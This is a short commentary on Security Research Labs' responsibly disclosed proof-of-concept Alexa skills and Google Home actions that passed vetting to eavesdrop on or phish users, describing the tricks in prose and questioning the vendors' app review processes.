Amazon Alexa and Google Home are listening. It’s likely you are aware of the security and privacy concerns as well as their mitigations. It’s the price we pay for the technology we want. Unfortunately, there is another attack vector recently exposed by researchers at Germany’s Security Research Labs (SRL). The most interesting part of this research is that it is an absolute “confirmed proofof-concept”. The researchers developed four Alexa “skills” and 4 more Google Home “actions”, submitted the malicious apps where they all passed Amazon and Google security vetting processes, and made it into the respective markets. SRL developed two types of malicious applications: a set for eavesdropping, and a set for phishing. The eavesdropping apps responded to the wake phrase and provided the requested information while the phishing apps responded with an error message. Both methods created the illusion of stopped functions while proceeding silently with their attack. The eavesdropping attacks used methods involving pauses, delays, and exploiting flaws in text-to-speech engines speaking unspeakable phrases that produced no auditable output. This gave the impression that the application finished when it was still listening, recording, and sending it back to the application developer. In the case of the phishing apps, the error message created the impression that the application had finished unsuccessfully. Similar tricks to keep the application running were used followed by the application mimicking the device voice claiming there is an update available and requesting that the user say their account password. Neither Amazon Alexa nor Google Home do this, but naive users might respond. These seem like they may not be too effective- a user may not say anything of utility or anything at all to the eavesdropper and they should know to ignore the requests of a phishing attempt.
But these attacks highlight key issues:
• What vetting process is Amazon or Google using?
• What other exploitable flaws exist in their vetting methods?
• Why would Amazon or Google allow a functionality change after review?
Google Play has an unfortunate history of hosting a variety of malicious apps and eavesdropping concerns have been previously reported by Checkmarx and MWR Labs for Alexa skills. SRL did report the results of its research to Amazon and Google through their responsible disclosure process. Both companies removed the apps and said they are changing their approval processes to prevent skills and actions from having similar capabilities in the future. But SRL’s success raises serious concerns and it’s worth noting these key issues are not only applicable to listening smart home devices but can be considered for all applications available on any platform. I’m not ready to give them up just yet, but Dan Goodin of ARS Technica sums it up this way: “SRL’s research only adds to my belief that these devices shouldn’t be trusted by most people.”